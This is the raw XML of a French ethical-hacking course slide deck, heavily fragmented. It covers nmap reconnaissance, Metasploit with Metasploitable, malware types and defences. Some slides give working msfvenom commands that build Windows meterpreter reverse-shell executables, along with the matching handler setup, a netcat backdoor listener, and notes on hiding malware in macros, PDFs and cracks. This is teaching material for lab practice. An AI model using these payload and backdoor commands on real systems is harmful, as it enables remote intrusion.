              <a:t>S : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Stealthy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>half</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> Open Scan)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>(2way handshake)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sT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> 10.7.1.226</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>filter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>ip.addr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> eq 10.7.1.226</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>click one </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>converstation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> and "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filter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4. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Perform</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> banner </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>grabbing</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>OS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>detection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> : 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sO</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> 10.7.1.226</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Mora options 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-A 10.7.1.226</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>5. scan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>vulnerabilities</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>namp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> --script </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>vuln</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> 10.7.1.226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https://sectools.org/tag/vuln-scanners/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https://hassen-hannachi.medium.com/installing-openvas-on-kali-linux-a54baeaf806a</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>https://medium.com/@careertechnologymiraroad/openvas-scanner-fa518e9301f3</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>https://medium.com/@kennithlowy/installing-openvas-step-by-step-guide-0aa83239a34b</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>https://medium.com/@sonya.moisset/guide-de-s%C3%A9curit%C3%A9-pour-les-logiciels-open-source-meilleures-pratiques-pour-s%C3%A9curiser-vos-projets-c7ea78acb615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691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https://github.com/amtzespinosa/lord-of-the-root-walkthrough</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>https://github.com/abatchy17/abatchy17.github.io/blob/master/_posts/2017-02-23-oscp-like-vulnhub-vms.md</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR"/>
              <a:t>https://github.com/hackalcubo/CTF-Writeups/tree/main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4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3D15-C5B9-DCA8-F602-196D824C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D5876DC-23D5-A0B1-2B66-1000A8C43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C93A75-E9D1-F4A4-1D03-4232E6775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0F8E19-8706-E214-9551-6A62DCA42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17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20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rId3"/>
              </a:rPr>
              <a:t>https://www.youtube.com/playlist?list=PLQ3oLeY3ugbAO5LsDQij6mY3om5BJVsNl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638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initelogins.com/2020/01/25/msfvenom-reverse-shell-payload-cheatshe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securebit/meterpreter-shell-as-a-32-64-bit-dll-2520604e41f6" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://gist.github.com/dejisec/8cdc3398610d1a0a91d01c9e1fb02ea1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Attaques/Attaquants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56929-507F-42FD-69D5-557218C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Chaîne et requête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BFF29D-0210-1E81-5425-4F4DA6BE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34FEBA-C40E-4EA4-0A16-1BD5FB0A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2533814"/>
            <a:ext cx="12192000" cy="30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6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162B5-3944-2D9A-43EB-BC1F7CDB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Chaîne et requête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24EFED-8B63-CDA5-8979-53F09D29D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789974-B06E-FBEE-60D2-7BCD3911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87" y="1737360"/>
            <a:ext cx="10659762" cy="50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4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71A8A-B32D-DD7C-B9E4-918B008B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(1)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355B48-97F9-619D-436E-E06F44F5A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1681329"/>
            <a:ext cx="9205784" cy="4534119"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="132017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AD9D7-F818-6D65-DB9D-77F9F75EF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51E17-4DB2-36B8-9146-F44E4DD0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(2)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1BFB2B-724B-2547-C5D2-5A6D382B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846BE5-4809-F847-3F74-9EF492DD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" y="1075623"/>
            <a:ext cx="8664558" cy="57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5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F9414-33ED-1CFA-3DA4-320ABB08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Prise en main de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> et </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>metasploitable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2AEF11-BB56-F6F9-D37E-F7E10E244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65221" cy="489048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Pourquoi et pourquoi pas </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> ?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Pour l’introduction en </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>metasploit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(liens en descriptions)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Metasploitable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> : un système plein de vulnérabilité pour s’introduire en </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>metasploit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CTF et </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>TryHackMe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> : Serveur pour capturer des drapeaux (pour voir le niveau du pirate)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1032551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7E563-DEE6-9356-EC47-7766A460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Metasploit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977DD1-14D9-469A-5C8C-0AF02E4E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B397A6-C467-C621-6E8E-E12909AF0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845734"/>
            <a:ext cx="5187378" cy="37518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871982-3442-EB61-9444-F8AD861E6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577159"/>
            <a:ext cx="47244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Auxilliary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Outil de scan tel que le port d’une machine  cible, ou encore d’un service.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: show ???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: outil permet l’accès à des donnés confidentiel des identifiants ou des mots de passe de service ou d’application, le post-exploitation vient après l’exploitation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5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: code d’exploitation par lequel un attaquant profitera d’un défaut système. On utilise un exploit d’une application ou d’un service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utilisera un exploit pour attaquer une machine de façon à lui produire un résultat que les développeurs n’aurait pas envisager voir même anticiper.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: show exploits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64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75" y="2150076"/>
            <a:ext cx="11489725" cy="5366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Outils qui permettent de dissimuler des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 des exploits ou les deux combinés  en créant des couches sélectionnées par l’attaquant selon le système qui est utilisé sur la machine cible.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code que l’attaque souhaite exécuté sur la machine cible. Par exemple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revese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 crée une connexion distante depuis la machine cible vers l’attaquant. C’est la machine cible qui se connecte à la machine de l’attaquant. Il y a certain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d’un exploit qui engendre aussi un RCE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 code qui permet de faire fonctionner un exploit ou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une machine ou sur d’autres extension puis spécifique. (par exemple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507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16BCD-2ABA-410A-270A-518D8C42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Payload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR"/>
              <a:t>reverse  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>et binding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217474-9424-4872-12C8-D0954E4F5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8E8A6F-2CD1-5090-3DC7-9A7FA84B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8133217" cy="42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99E44-A056-28D0-EDE0-A8891328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 FACEBOOK</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>CYBER SECURITY(KALI)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4682451-982C-D227-B01F-3DCA051FD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45" y="-45745"/>
            <a:ext cx="4272455" cy="6903745"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2547744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63DDD-4253-4BA8-3B14-160B1BF2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r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>IMPACT 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9FA56-C0EC-4E84-2AC3-48E96650F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81611"/>
            <a:ext cx="11094720" cy="5012266"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="3200" dirty="0"/>
              <a:t>Disfonctionnement (bug)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="3200" dirty="0"/>
              <a:t>Déni de services</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="3200" dirty="0"/>
              <a:t>Avec ou sans interactions utilisateurs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="3200" dirty="0"/>
              <a:t>RCE (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="3200" dirty="0" err="1"/>
              <a:t>Remote</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="3200" dirty="0"/>
              <a:t> Code </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="3200" dirty="0" err="1"/>
              <a:t>Execution</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="3200" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="3200" dirty="0"/>
              <a:t>Confidentialité  - Authenticité – Intégrité – Non répudiation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="3200" dirty="0"/>
              <a:t>Disponibilité</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="3200" dirty="0"/>
              <a:t>Preuve</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="3200" dirty="0"/>
              <a:t>Anonymité</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3124404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DF7AAC-195D-AC3F-89D7-B363E4AA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MSFCONSOLE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749C57-FD2E-97DD-3BB0-D2BD1B66E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0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89363-D0CC-0AE5-BFBA-56B195B9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43" y="-553839"/>
            <a:ext cx="10515600" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Msfvnom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> en local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FE092-BB01-E6CE-FBA2-83C4C921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31" y="108943"/>
            <a:ext cx="11557772" cy="6155933"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="70000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/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Utiliser ifconfig pour trouver l’adresse IP</a:t>
            </a:r>
          </a:p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Generer puis lancer le programme malvaillant sur le client (commande en un ligne) : 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msfvenom -p windows/meterpreter/reverse_http -a x86 –platform windows -f exe LHOST=192.168.113.133 LPORT=80 -o /home/kali/Desktop/something32.exe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msfvenom -p windows/x64/meterpreter/reverse_http -a x64 –platform windows -f exe LHOST=192.168.113.133 LPORT=80 -o /home/kali/Desktop/something32.exe</a:t>
            </a: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Changer droit pour être copié après : </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" i="0" u="none" strike="noStrike" kern="1200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chmod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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777 /home/kali/Desktop/something32.exe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 le programme d’ecoute (search + use peut être aussi utilisé)  :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exploit/multi/handler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payload windows/meterpreter/reverse_http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lhost 192.168.113.133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lport 80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exitonsession false</a:t>
            </a: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-j –z</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-B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Problem Resolution : https://null-byte.wonderhowto.com/forum/problem-with-msfvenom-windows-7-64-bit-exe-version-file-is-not-compatible-0177363/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 : </a:t>
            </a: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https://infinitelogins.com/2020/01/25/msfvenom-reverse-shell-payload-cheatsheet/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DOC2 : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-B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https://gist.github.com/dejisec/8cdc3398610d1a0a91d01c9e1fb02ea1</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR" sz="1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DOC3 : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-B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https://medium.com/securebit/meterpreter-shell-as-a-32-64-bit-dll-2520604e41f6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89363-D0CC-0AE5-BFBA-56B195B9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61" y="0"/>
            <a:ext cx="10515600" cy="1325563"/>
          </a:xfrm>
        </p:spPr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Msfvnom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local ou vers internet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FE092-BB01-E6CE-FBA2-83C4C921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09" y="1862846"/>
            <a:ext cx="11992947" cy="5921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au victime : </a:t>
            </a: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Sessions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="1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Puis selo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-F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les machines trouvées : </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-F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Sessions i</a:t>
            </a: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Avec i : le numéro de la machine</a:t>
            </a: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b="1" i="0" u="none" strike="noStrike" kern="1200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Tapez la commande help pour plus d’éclaircissement </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR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800" b="1" i="0" u="none" strike="noStrike" kern="1200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19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2289C5-B609-B06A-343B-8352B0D7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 de CVE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51068A-9E27-AFFE-1406-BD45F05B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5B57EE-8478-9156-C568-9E46309A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1964544"/>
            <a:ext cx="12192000" cy="29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21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Programmes malveillants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F6CF135-408D-EE4F-2F40-B7F1934F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Worm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Virus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Trojan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Ransomware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 Tools)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Keylogger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Backdoor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004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4BB79-7A91-D2CF-9433-A88E51FA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AF5FC-63E4-08F9-B932-75A94652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0"/>
            <a:ext cx="11353800" cy="87438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Programmes malveillants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5007F4-0F56-C334-47D1-99BB28C1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A94907-CCB2-37D7-CBD4-C43E83E0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32" y="874385"/>
            <a:ext cx="6829168" cy="58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F5DD0-A99F-ED39-15AC-50F797BD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avec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netcat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backdoor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5B3B3-70AE-EFEF-03AC-600D4F3C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attaquant (lien1 en description)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attaquant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–v –l –p 9001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cible (lien2 en description)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="308537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9D39E-79B2-DF4E-98BF-F9A9B8E9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VSFTP BACKDOOR AVEC METASPLOITABLE 2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CFF958-810B-D08D-7DC9-9446752A8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Post-exploitation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Pratique de l’ouverture de backdoor manuel </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Pratique de l’ouverture de backdoor avec </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>metasploit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48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80DF3-8536-3FFF-494C-45023F5C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FUDDING : Cacher les programmes malveillants dans d’autres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D095F-8773-4C5C-8DB0-AEDC94A8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un macro de office par exemple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(Lien en description)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un PDF :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(Lien en description)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un fichier binaire (les cracks surtout et les faux mise à jour des antivirus)  : Pire encore dans un OS (reverse engineering and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injecting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virus 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binaries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1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9E38247-A3ED-1B6D-D900-C10A0F2BAC3E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="489533"/>
            <a:ext cx="10515600" cy="192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étapes de l’éthique hacking (web, système, application, …) :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/>
            </a:br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6A85B0E-ADE5-D9F1-D63A-49CEB978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0701"/>
            <a:ext cx="10787743" cy="4737754"/>
          </a:xfrm>
        </p:spPr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de reconnaissance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de l’exploitation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de post-exploitation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(CYBER KILL CHAIN)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4064388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37619-5336-EF64-518E-B38E834C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kali metasploitable2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AD02FF-D565-F417-812F-6570497F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378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8D4FA-2248-CEBB-E6A7-C726D789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2595D2-36BB-4939-4B49-3767FF24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0"/>
            <a:ext cx="11353800" cy="87438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Pièges internautes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689A6A-F0D4-1D8D-0DF0-F2CEF255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05B89C-C3DE-529A-4065-34AD809D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874384"/>
            <a:ext cx="11745613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3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2717D-ED87-A755-945A-2DF19A16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Attaques web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287B0B4-FC5F-EA36-BFA6-0A29DED6F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924050"/>
            <a:ext cx="10727820" cy="2388458"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3975925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108AF-CBC3-CB48-ABB4-831C7900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: COMMENT CRÉER DES FAILLES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713333-E4EE-13C9-B988-3E9F510B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(input)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(output)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forcing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Fuzzing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Fuzzing des inputs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 de processus sur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oscp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engineering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27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95094-D9EE-3917-8688-E70E4040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Cycle de vie de logiciel &amp; CVE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6B302-F160-60F9-7AE6-42BB54B9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3E7072-15DA-71D1-26AF-98CA3387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3"/>
            <a:ext cx="8193216" cy="43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57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D6DF0-DDED-F58A-BB4F-35BF5A51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CVE et CVS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C62D96-AEE6-00D8-8E9A-6452E145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Disfonctionnement ou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utilisateur</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1857991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56A41-2084-2667-D654-2B9CD5FC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Protection Platform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13E923-341E-AA1A-378F-3E05A0337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Antimalware, pare-feu, IDS, chiffrement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Détections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 signature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 comportement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Heuristique</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3178687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C4B21-B604-090D-B732-BD49CAD5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0-day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9A89E0-5EE0-C877-FFDE-D62059DF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6595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C3FFD-5540-B0B2-C372-4223160E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Bonnes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9F141B-297C-C2DC-A4F1-58239ED5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EPP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Sauvegarde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Historisation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1371912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D9B18-0BD2-676C-292F-01D27ED2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C8595C-DBAA-B936-67D5-F106B4749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1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38C85A-BC84-FAC5-2E41-99B77866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de reconnaissance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BE4335-63D0-BAA5-92EF-281AE07A7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Manuelle ou automatisée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Existence des résultats faux positifs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Nécessitant des accords du chef hiérarchique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au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hackback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907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F317A0-73CB-0F79-6107-2A306384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améliorer la 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CC7BA-7BD1-708B-B50F-7EC8C5213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E3A6A3-3929-14E0-F0A0-2B0BB7335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328306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41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B824F-C5BB-12DD-511F-05FF0127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CADCF-8FA1-A092-774C-BD8B4CB8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améliorer la </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>securité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B2F42-971C-F69A-4959-6B707465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3FFD41-C5E4-468C-EA9C-BBF2235B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9044"/>
            <a:ext cx="6316774" cy="50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77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FB156-23AC-A58F-08E8-C1B96733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7384"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Domaine à sécuriser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9CFC5C-135A-7CD5-370C-CEDFA619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70F3B7-68D5-9C8B-F0D5-25FCED95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76" y="1413690"/>
            <a:ext cx="8232071" cy="50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45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9C909-A5C1-04A3-CBBC-BE824ED6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93ECB8-764B-36D6-CBBD-AC579FA68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DAFDFF-EBDA-707A-ABAF-1AE691F0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" y="1383956"/>
            <a:ext cx="11205814" cy="34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6249B-8280-58F1-8917-A61BE62D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7B475-67B1-E081-A9AC-096C218A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66BF44-D971-E3AE-10DE-C43F04C7A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DAF33B-3CB0-C3B7-366D-17EB3E58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988905"/>
            <a:ext cx="7599406" cy="569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41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E0847-CA93-BB78-1140-D9BAF4CF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278AB5-84F2-D331-E38E-614E8917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EE2277-BCBA-86C4-B923-1084D3F67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EE627-96B2-F97B-6D52-2C060A61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254210"/>
            <a:ext cx="8275166" cy="22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6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945DC-E2DF-D23E-EEB0-1F026A9E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673EE-C5A2-83FF-5EE9-D0516647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FFECB3-4DE0-65D0-6E86-61EE2329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E38EA7-2D0C-77C0-7970-CF9AB668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228725"/>
            <a:ext cx="9939433" cy="42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34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118C3-921B-4EAF-1701-20C5A3AF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AE69-8848-2488-219D-5A868306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CFD21D-983D-6484-A588-A27177948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02A159-AE03-6ED1-8C9A-0B73F820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1" y="1297459"/>
            <a:ext cx="9593715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45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196B-C34D-F32D-D416-F9BDBDAA8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CB697-7414-A1C0-5DEC-2D7A6DC4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286603"/>
            <a:ext cx="10401918" cy="70230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Typologie des attaques et des attaquants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ACEC24-A03D-379D-9921-903A77F1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5" y="1297459"/>
            <a:ext cx="10488415" cy="457163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7B17DC-6FC4-5B00-6538-EB82724D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0554"/>
            <a:ext cx="8849497" cy="24207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EC51A6-C038-E5B5-C5D7-AFF23422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3712988"/>
            <a:ext cx="8651376" cy="22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15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695D0-ACC9-9B4A-8B0A-FE2F8BA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21D09F-A917-3E35-E882-E94C860AE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9F152B-E481-918F-F004-D73EC32F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0296"/>
            <a:ext cx="9145648" cy="54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0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636709-3DDC-3B0F-14FC-23555E36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FCE9C-5DC4-FEC5-4835-26C8E2845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Eliminer les faux positifs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Nécessitant des accords du chef hiérarchique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Sauvegarde obligatoire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95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64444-BA29-EB26-9BE8-DE16677B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74E972-5E43-9CAF-050C-F8F7F842E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E13506-38F7-C902-131D-973C017C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767535"/>
            <a:ext cx="10072560" cy="53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63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AC6DA-35A9-37A6-FE5C-8B445044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DE39C1A-D50F-458B-5A09-09FFE0507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805" y="0"/>
            <a:ext cx="10211984" cy="5600120"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1903802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241064-E5C0-20C7-7B22-4E206F78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2CBF6C-7831-41FF-64C1-6D4A5432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E10DE7-D9BE-1F5D-DE1B-946FCDB7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86603"/>
            <a:ext cx="10331896" cy="531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05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6F437F-5349-739D-14F4-C56FDE5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B3EC6-B4B5-95AA-AAA5-CFAE7A1A2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E3753E-E943-21AA-14BE-2B03BC04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8795"/>
            <a:ext cx="10119360" cy="54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3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05F95-8BEA-12C0-F400-1E057973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17E98-D5D6-B575-93CE-8EB0DE004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4F51FC-1EFD-B802-AD27-D5597B18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191658"/>
            <a:ext cx="7743979" cy="65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1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02CCC-97B7-7562-7F0B-39656FE0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8A92D-9FF3-436B-325A-758313710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45F0AD-D012-5A2A-0986-6F3A9B42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700"/>
            <a:ext cx="5721178" cy="52073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EBC01A-A5D1-B5DA-7BFB-4E00EEE02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178" y="147405"/>
            <a:ext cx="6353022" cy="46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34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A65E7-CFE4-E459-5D62-94F744B0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la sécurité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721C8-68AD-92F2-DB23-4A5EE9E6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70E74D-D858-07C4-912E-5E2524A5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32" y="1845734"/>
            <a:ext cx="6870744" cy="475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5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08F13-DA77-AADF-8004-313FAABA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la sécurité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96F224-9D17-DF6C-6EE4-2BC9449D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197489-FA05-F592-283C-C6A86CB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961939"/>
            <a:ext cx="9981248" cy="36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01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83ECA-9598-11B0-5B96-5EE8D35D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Audit de la sécurité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BB459A-6500-7CDE-8B17-D3E6DA786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B7128F-E5F8-3DE9-B707-0EA8B3AC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12" y="1845734"/>
            <a:ext cx="9135289" cy="45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1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1B7D2-304B-4E33-16FF-D66AA388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(maj)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E7343-65F8-9697-FC51-75413759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95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Outils de reconnaissance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F6CF135-408D-EE4F-2F40-B7F1934F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Whois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netcraft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Nslookup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341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268B8-180B-D867-ECC9-A139F9B2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SURETE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130702-3364-A9A7-2FAC-F429C0813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374255-89AB-F4ED-3A46-0CD98DDC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5" y="1845733"/>
            <a:ext cx="6794826" cy="47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39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D1C1-2A88-A35E-BBF2-5DFE9674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AEC69C-95E7-D531-AEB4-C5E16009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SURETE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8052E3-344F-2479-DCF1-881E4792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C6E7F1-AEDB-5DDA-1E06-3243E908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5416"/>
            <a:ext cx="7404169" cy="486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78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2F45-6884-ACDD-066E-D86C87AC6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211F9-5A96-013C-5CA1-4EE5EB92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SURETE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F318AA-4273-6646-F33B-39D979AFC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6976B4-D173-47D1-C42E-39A98CB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19275"/>
            <a:ext cx="7428882" cy="45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3D74D-A989-96BA-08D8-6CFC942A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804EC-5633-3FBC-2FB8-DB517AFC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BA841D-35AC-EF0F-95D4-B98C3500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0"/>
            <a:ext cx="8849909" cy="40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60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75182-AD3F-10FC-05B2-AD12B67D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5F1F6A-C755-492B-2D71-A050DAC1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A3813-4468-4BA5-2D3F-6CCBC60E3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6EF399-0BB6-3D9B-5125-20D6E77C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470"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1173480" y="1845734"/>
